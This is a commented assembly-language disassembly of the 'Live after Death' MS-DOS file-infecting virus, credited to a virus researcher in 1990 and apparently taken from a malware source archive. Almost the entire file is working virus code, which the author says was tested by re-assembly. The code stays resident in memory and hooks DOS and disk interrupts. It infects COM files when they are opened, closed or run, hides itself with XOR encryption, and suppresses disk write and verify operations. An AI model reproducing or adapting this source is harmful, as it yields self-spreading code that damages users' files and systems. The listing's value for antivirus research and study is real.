MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.v800.asm

	page	,132
	name	V800
	title	The 'Live after Death' virus
	.radix	16

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20>  Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", ap. 51        <20>
; <20>  Telephone: Private: (+35-92) 58-62-61, Office: (+35-92) 71-401 ext. 255 <20>
; <20>									     <20>
; <20>			   The 'Live after Death' Virus                      <20>
; <20>		    Disassembled by Vesselin Bontchev, May 1990 	     <20>
; <20>									     <20>
; <20>		     Copyright (c) Vesselin Bontchev 1989, 1990 	     <20>
; <20>									     <20>
; <20>	 This listing is only to be made available to virus researchers      <20>
; <20>		   or software writers on a need-to-know basis. 	     <20>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ

; The disassembly has been tested by re-assembly using MASM 5.0.

code	segment
	assume	cs:code, ds:code

	org	100

timer	equ	46C
v_len	=	v_end-v_entry

start:
	jmp	v_entry 	; JMP to the virus code

	db	900d dup (90)	; The beginning of the infected program

v_entry:			; The virus body begins here
	cli			; Disable interrupts
	xchg	ax,bp		; Save AX

	call	self		; Point SI at the start of the encrypted part
self:
	pop	si		; Get current address
	add	si,19		; (v_start-self) Length of the decryption part

	cld			; Clear direction flag
	mov	di,si		; Point DI at v_start too
	xor	dx,dx		; DX := 0 (the checksum is formed there)
	mov	cx,(v_end-v_start)/2	; The length of the encrypted part
	push	cx		; Save it on stack
do_chksum:			; Compute the checksum of the encrypted part
	lodsw			; Get word
	xor	dx,ax		; ChkSum ^= Word
	loop	do_chksum	; Loop until done
	pop	cx		; Restore length (in words) in CX

; Decrypt the encrypted part. XOR every word of it with the computed checksum.

decrypt:
	xor	[di],dx 	; XOR a word
	inc	di		; Point to the next one
	inc	di
	loop	decrypt 	; Loop until done

; The code beyond this point was encrypted. If this source is
; assembled now, it won't run, since the decryption part will
; scramble it. To produce a 'live' virus, the following code
; must be encrypted "manually" (i.e., with another program)
; after assembly.

v_start:

; Adjust SI to point at v_entry (it currently points at v_end):

	add	si,v_entry-v_end

	mov	bx,sp		; Install a new stack at the
	mov	cl,4		;  program's end - just to be sure
	shr	bx,cl		;  that the original one won't
	inc	bx		;  corrupt the virus
	mov	ax,ss
	add	bx,ax

	mov	cx,v_len/2	; CX := virus length in words
	mov	di,4
	mov	ax,[di-2]	; Get TopMem segment (_psp [2])

	dec	dx		; Subtract 1 from the checksum

	push	ds		; Save DS & checksum on the stack
	push	dx

	mov	dx,ds		; DX := DS

	mov	ds,di		; Check if INT 2Ah is intercepted by a
	cmp	ax,[di+(2A*4+2-(4*10+4))]	;  program at TopMem
	je	in_mem		; Virus present in memory if so

; Virus not in memory. Install it there:

	sub	ah,2		; Reserve 8 K memory (?!)
	cmp	bx,ax		; Enough memory?
	jae	no_mem		; Exit if not
	dec	di		; Point DI at TopMem
	dec	di
	stosw			; Lower TopMem by 8 K

	dec	dx		; Point ES at program's MCB
	mov	es,dx
	sub	byte ptr es:[di],2	; Lower MCB's size by 8 K too

; Install the new INT 2Ah handler. This interrupt (funcrion 82h) is
; called by PC-DOS on every file-related function. Thus, the virus
; gets control without even intercepting INT 21h!

	mov	[di+(2A*4+2-(4*10+4))],ax	; Segment
in_mem:
	mov	word ptr [di+(2A*4-(4*10+4))],int_2A-v_entry	; Offset

	push	ax
	les	bx,[di+(13*4-(4*10+4))] ; Get the current INT 13h handler
	mov	ah,13		; Get the original INT 13h handler
	int	2F		;  (DOS 3.30 only)
	mov	cs:[si+do_it_i+1-v_entry],bx	; Save the found vector as a
	mov	cs:[si+do_it_i+1+2-v_entry],es	;  Far JMP in the virus body
	mov	ah,13		; Restore the internal (DOS) INT 13h handler
	int	2F

	mov	ax,es		; Get INT 13h handler's segment in AX

	push	cs		; DS := CS
	pop	ds

; Compare the segment of the found INT 13h handler with the
; one, stored as a Far JMP. If they match, this means that
; the virus is already present in memory (i.e., loaded for
; a multiple infected file).

	les	bx,[si+do_it_i+1-v_entry]
	cmp	ax,[si+do_it_i+1+2-v_entry]	; Virus already in memory?
	pop	ds		; Restore DS
	pushf			; Save the result of the comparision on stack

	push	ds		; Save DS
	mov	dx,int_13i-v_entry	; Install new internal INT 13h handler
	mov	ah,13		; Do it
	int	2F
	pop	es		; ES := saved DS

	xor	di,di		; DI := 0

	push	si		; Save SI & CX
	push	cx

; Move the virus body in the allocated segment at TopMem:

	rep	movs word ptr es:[di],word ptr cs:[si]

	push	es		; ES := DS
	pop	ds

	mov	[di+0A],cl	; Zero old_op

	pop	cx		; Restore CX & SI
	pop	si

	pop	[di+8]		; flags (i.e. - virus installed)
	pop	[di+6]		; chksum-1

no_mem:
	pop	es		; Clear the stack
	sti			; Enable interrupts

	push	cs		; DS := CS
	pop	ds

	mov	di,offset start-2	; DI := 0FEh
	push	di		; Push this value in the stack
	mov	ax,0A5F3	; Store REP MOVSW there
	stosw
	push	si		; Save SI
	add	si,first3-v_entry	; Point SI at the saved first 3 bytes
	movsw			; Restore the original first 3
	movsb			;  bytes of the file
	pop	di		; DI := saved SI
	lodsw			; Get the offset at which the file was split
	xchg	ax,si		; Put it in SI
	add	si,offset start ; Adjust it with the PSP length
	xchg	ax,bp		; Restore AX (to keep DISKCOPY happy)

; On the top of stack now there is 0FEh. Therefore, the RET instruction
; will transfer the control to the program at this address. And at this
; address there is the REP MOVSW instruction (put there by the virus).
; Therefore, it will restore the second part of the file (split by the
; virus) and will begin to execute it from the beginning (the first 3
; bytes are already restored).

	ret

; Infection routine:

infect:
	push	cx		; Save registers used
	push	dx
	push	si
	push	di
	push	ds
	push	es

	xor	cx,cx		; DS := AX := 0; CX = function
	xchg	ax,cx
	mov	ds,ax

	push	cs		; ES := CS
	pop	es

	mov	di,do_it+1-v_entry	; Install new INT 13h handler
	mov	si,13*4
	mov	ax,int_13-v_entry	; New handler's offset
	xchg	ax,[si]
	stosw			; Save the old one as a Far JMP
	push	ax		; Save it on the stack too

	mov	ax,es		; Do the same with the handler's segment
	xchg	ax,[si+2]
	stosw
	push	ax

	mov	ax,int_24-v_entry	; Install new INT 24h handler
	xchg	ax,[si+24*4-13*4]
	push	ax		; Save the old one on the stack

	mov	ax,es		; Do the same with the handler's segment
	xchg	ax,[si+24*4-13*4+2]
	push	ax

	push	ds		; Save DS & SI (0 and 13*4 respectively)
	push	si

	xor	dl,dl		; Turn Ctrl-Break checking off
	mov	ax,3302 	;  and get the old checking state
	int	21
	push	dx		; Save state on stack

	mov	ax,1220 	; Get system file table number in ES:DI
	int	2F		; Do it
	jc	inf_xit 	; Exit on error

	push	bx		; Save BX
	mov	bl,es:[di]	; Put system file table number in BL
	mov	ax,1216 	; Get address of system FCB in ES:DI
	int	2F		; Do it
	pop	bx		; Restore BX
	jc	inf_xit 	; Exit on error

	mov	si,ds:[timer]	; Load SI with a random value

	push	es		; DS := ES
	pop	ds

	mov	cl,80		; Prepare to test if it's a disk file

	cmp	ch,3E		; Close file operation requested?
	jne	dont_dup	; Don't duplicate handle if so
	mov	ah,45		; Otherwise do it
	int	21
	jc	inf_xit 	; Exit on error
	xchg	ax,bx		; Save handle in BX

; Prepare to test for disk file and wheather file has been written:

	mov	cl,0C0

dont_dup:
	and	cl,[di+5]	; Test the Device Info Word
	jnz	inf_xit 	; Exit if test fails

	xor	dx,dx		; DX := 0

	cmp	dx,[di+13]	; Is file size > 64 K?
	jne	inf_xit 	; Exit if so
	mov	ax,[di+28]	; Get the first 2 bytes of the file extension
	cmp	ax,'XE'         ; .EXE-file?
	je	chk_last	; Go check the last letter too
	cmp	ax,'OC'         ; Maybe it's a .COM-file?
	jne	chk_exec	; If not, try to infect it only on execution
	cmp	ax,[di+20]	; Is this the file "COMM*.CO*"?
	mov	ax,'MM'
	jne	chk_last	; If not, check wheather it really has
	cmp	ax,[di+22]	;  a .COM extension
	je	inf_xit 	; Otherwise exit
chk_last:
	cmp	al,[di+2A]	; Check the last letter of file's extension
	je	chk_len 	; Check the file size if name does match
chk_exec:
	cmp	ch,4Bh		; Exec function requested?
	jne	inf_xit 	; Exit if not

; Check if file length fits in the infectable intervals.
; The infectable intervals are:
;	1024 -	8191	( 0400h -  1FFFh)
;	9216 - 16383	( 2400h -  3FFFh)
;      17408 - 24575	( 4400h -  5FFFh)
;      25600 - 32767	( 6400h -  7FFFh)
;      33762 - 40959	( 8400h -  9FFFh)
;      41984 - 49151	(0A400h - 0BFFFh)
;      50176 - 57343	(0C400h - 0DFFFh)
;      58368 - 64511	(0E400h - 0FBFFh)

chk_len:
	test	byte ptr [di+12],00011100b
	jz	inf_xit 	; Exit if not in an infectable interval
	cmp	byte ptr [di+12],11111100b
	jb	len_ok

inf_xit:			; File not suitable for infection
	jmp	close		; Close it and exit

len_ok:
	mov	ax,[di+11]	; Get file size (from the internal FCB)
	xchg	ax,si		; Put it in SI (the random value is now in AX)
	xchg	al,ah		; "Randomize" it a bit more
	push	si		; Save SI (pointed at file end)

; Compute in DX the random position at which the file will be split:

	sub	si,3
	div	si		; DX := ((f_size - 3) mod rand ()) + 3
	add	dx,3

	lds	si,[di+7]	; Get Device Control Block info
	cmp	byte ptr [si+8],2	; Is the number of FATs >= 2? (?!)
	pop	si		; Restore SI (to point at file end)
	jb	inf_xit 	; Exit if not (only 1 FAT, that is)
	mov	byte ptr es:[di+2],10b	; Set file open mode to writable
	xor	ax,ax
	xchg	ax,es:[di+15]	; Get file position in AX and seek to file beg.
	push	ax		; Save original position on stack

	push	cs		; DS := CS
	pop	ds

	push	dx		; Save computed split position on stack

	mov	dx,first3-v_entry
	mov	cx,3		; Read the first 3 bytes of the file
	mov	ah,3F		;  and save them in the virus body
	int	21		; Do it

	pop	ax		; Restore split position from stack

	jc	xit1		; Exit on error
	mov	es:[di+15],ax	; Seek at split position
	sub	ax,3		; Form a JMP instruction to that position
	mov	ds:[jmp_adr-v_entry],ax ;  at jmp_op

	mov	ax,ds:[first3-v_entry]	; Get the first 2 bytes of the file
	cmp	ax,'ZM'         ; Is it an .EXE-type file?
	je	xit2		; Exit if so
	cmp	ax,'MZ'         ; Double check for .EXE-files
	je	xit2		; Exit if such file

	mov	dx,buffer-v_entry
	mov	cx,v_len	; Read the original (up to v_len)
	mov	ah,3F		;  bytes into the buffer
	int	21		; Do it
xit1:
	jc	xit2		; Exit on error

; Get the number of bytes read in CX and put the virus length in AX:

	xchg	ax,cx

; SI points at file end. Add the virus length to get the new file size:

	add	si,ax

; Now subtract the number of bytes read in, just to compute
; the offset from the beginning of the file, at which the
; second part of the splitted file has to be written:

	sub	si,cx

	mov	es:[di+15],si	; Seek at the computed offset
	mov	ah,40		; Write the original second part of the file
	int	21		; Do it
	jc	xit2		; Exit on error
	sub	ax,cx		; All bytes written?
	jnz	xit2		; Exit on error

	xchg	ax,si		; SI := 0; AX := split position
	mov	ds:[split-v_entry],ax	; Save split position in the virus body
	mov	ax,ds:[jmp_adr-v_entry] ; Get the computed new JMP address
	add	ax,3
	mov	es:[di+15],ax	; And seek to that address in the file

	push	dx		; Save DX (currently points at the buffer area)
	xor	dx,dx		; DX := 0 (the checsum is formed there)
	mov	cx,v_len/2	; Virus length in words

; Compute the new checksum of the virus and use it to encrypt the virus:

encrypt:
	lodsw			; Get a word from the virus body
	db	81, 0FE, 20, 0	; I was unable to make MASM generate this (?!)
;	cmp	si,v_start-self+1
	jb	no_crypt	; Don't encrypt the decryption part
	xor	ax,ds:[chksum-v_entry]	; Compute the checksum
	xor	dx,ax
no_crypt:
	mov	word ptr [si+(data_1-v_entry)],ax	; Encrypt with it
	loop	encrypt 	; Loop until done

	xor	dx,ds:[chksum-v_entry]	; Save the checksum
	xor	[si+2F3],dx	; (?!)
	pop	dx		; Restore DX (to point to the buffer area)

	mov	cx,v_len	; Write the virus body in the file
	mov	ah,40
	int	21		; Do it
	jc	xit2		; Exit on error
	sub	ax,cx		; All bytes written?
	jnz	xit2		; Exit on error

	mov	es:[di+15],ax	; Seek to file beginning (AX == 0 now)

	mov	dx,jmp_op-v_entry
	mov	cx,3		; Overwrite the first 3 bytes of the file
	mov	ah,40		;  with a JMP to the virus code
	int	21		; Do it

xit2:
	pop	word ptr es:[di+15]	; Restore file position
	or	byte ptr es:[di+6],40	; Set 'File Modified' bit

close:
	mov	ah,3E		; Close the file
	int	21

	pop	dx		; Restore Ctrl-Break state from stack
	mov	ax,3301 	; Set old Ctrl-Break state
	int	21

	pop	si		; Restore SI & DS (13*4 and 0 respectively)
	pop	ds

	pop	word ptr [si+24*4+2-13*4]	; Restore the old
	pop	word ptr [si+24*4-13*4] ;  INT 24h handler
	pop	word ptr [si+2] ; Restore the old INT 13 handler
	pop	word ptr [si]

	pop	es		; Restore used registers
	pop	ds
	pop	di
	pop	si
	pop	dx
	pop	cx
	ret			; Done. Exit

; New INT 2Ah, subfunction 82h handler. DOS calls
; this function on every file-related operation.

int_2A:
	push	si		; Save registers used
	push	di
	push	bp
	push	ds
	push	es

	mov	bp,sp
	cmp	ah,82		; Function 82h?
	jne	int2A_xit	; Exit if not
	mov	ax,ds		; Is the current DS equal to caller's CS?
	cmp	ax,[bp+0C]
	jne	int2A_xit	; Exit if not

	mov	si,[bp+0A]	; Get the byte at caller's CS:IP
	lodsb
	cmp	al,0CC		; Is it an INT3 instruction?
	je	int2A_xit	; Exit if so

	mov	ax,1218 	; Get caller's registers
	int	2F
	les	di,[si+12]	; CS:IP, more exactly
	cmp	byte ptr es:[di],0CC	; Is there an INT3 instruction?
	je	int2A_xit	; Exit if so

	mov	ax,cs		; Called from the current segment
	cmp	ax,[si+14]	;  (i.e., from the virus)?
	je	int2A_xit	; Exit if so

	cmp	word ptr es:[di-2],21CDh	; Called from INT 21h?
	jne	int2A_xit	; Exit if not

	push	cs		; ES := CS
	pop	es

	mov	di,v_len	; Point ES:DI at virus length
	lodsw			; Get caller's AX
	mov	bp,ax		; Save it in BP
	sub	ah,3Dh		; Open file handle function requested?
	je	ok4inf		; OK for infection if so
	dec	ah		; Close file function requested?
	je	ok4inf		; OK for infection if so
	sub	ah,0Dh		; Exec function requested?
	jne	int2A_xit	; Exit if not
	cmp	al,2		; Subfunctions 0 or 1?
	jae	int2A_xit	; Exit if not

; Now AH == 0. Check to see if count (ES:[DI-3E]) is zero too.
; If it's not, that would mean that this file handle belongs
; to an already infected by the virus file.

ok4inf:
	cmp	ah,es:[di-3E]	; Is count equal to zero?
	mov	cs:[di-3E],ah	; Zero count
	jne	int2A_xit	; Exit if not
	mov	bl,0C2		; Othewise scramble BX (?!)

; Get the caller's CS:IP and save them as a Far JMP (just at v_end).
; Also, modify them to point at the program at loc_1. In this way,
; when the INT 2Ah handler terminates, the program at loc_1 will
; receive control. It will (eventually) infect the file and then
; perform a Far JMP to the place, where INT 2Ah was called.

	mov	ax,loc_1-v_entry	; Offset
	xchg	ax,[si+10]	; Shouldn't it be [si+14]? (?!)
	dec	ax
	dec	ax
	stosw
	mov	ax,cs		; Segment
	xchg	ax,[si+12]
	stosw

	xchg	ax,bp		; Restore AX from BP
	stosw			; And save it in old_ax

int2A_xit:
	pop	es		; Restore used registers
	pop	ds
	pop	bp
	pop	di
	pop	si

; New INT 24h handler. Just terminate; AH
; already contains the suggested action.

int_24:
	iret			; End of INT 2Ah and INT 24h handlers

int_13i:			; New internal INT 13h handler
	cmp	byte ptr cs:[old_op-v_entry],0	; Iterrupt called from virus?
	je	do_it_i 	; If not, just perform it "as is"
	xor	ah,ah		; Else zero the old_op flag and call the
	xchg	ah,byte ptr cs:[old_op-v_entry] ; interrupt with the true value
do_it_i:
	db	0EA, 71, 0A9, 0, 0F0	; Far JMP to old intern INT 13h handler

int_13: 			; New INT 13h handler
	mov	byte ptr cs:[old_op-v_entry],ah
	cmp	ah,4		; VERIFY operation specified?
	je	verify		; Return OK without performing it
	cmp	ah,3		; WRITE operation requested?
	jne	do_it		; Just execute the old handler if not
	push	cs:[flags-v_entry]
	popf			; What was the flags state?
	jz	do_it_i 	; Execute operation if flags OK
	dec	ah		; Otherwise fake a READ operation
do_it:
	db	0EA, 1F, 1Dh, 70, 0	; Far JMP to old INT 13h handler
verify:
	sub	ax,ax		; Return 'No errors' (AX == 0 && CF == 0)
	sti			; Enable interrupts
	retf	2		; Done. Exit

count	db	1		; Counter how many times the file is infected
first3	db	0E9, 0F8, 3	; The first 3 bytes of the file
split	dw	6A7		; Address at which the file was split
	dw	46BC		; (?!)
jmp_op	db	0E9		; Here a JMP to the virus code is formed
jmp_adr dw	384		; The addres at which is JMPed

	db	0, 'Live after Death', 0

loc_1:
	pushf			; Save Flags
	cli			; Disable interrupts
	push	bx		; Save BX
	cld			; Clear direction flag
	inc	byte ptr cs:[count-v_entry]	; Increment infection counter
	cmp	ah,3E		; CLOSE function call?
	je	do_inf		; Just infect file if so
	xchg	ax,bx		; Otherwise get handle in BX
	mov	ax,3D00 	; Open the file for Reading only
	int	21
	jc	dont_inf	; Don't infect if an error occured
	xchg	ax,bx		; Get handle in BX
do_inf:
	call	infect		; Infect the file
dont_inf:
	mov	ax,cs:[old_ax-v_entry]	; Restore caller's AX
	pop	bx		; Restore BX
	popf			; Restore Flags

; Here is formed a Far JMP to the program, which called INT 2Ah, function 82h:

	db	0EA

v_end	equ	$		; End of virus code
old_ax	equ	v_end+4 	; Place to store caller's AX
chksum	equ	old_ax+2	; Here a checksum is formed for encryption
flags	equ	chksum+2	; Flag
data_1	equ	flags+1 	; (?!)
old_op	equ	data_1+1	; The last INT 13h operation
buffer	equ	old_op+1	; Program I/O buffer

	db	116d dup (90)	; The second part of the infected program

	mov	ax,4C00 	; Exit program
	int	21

code	ends
	end	start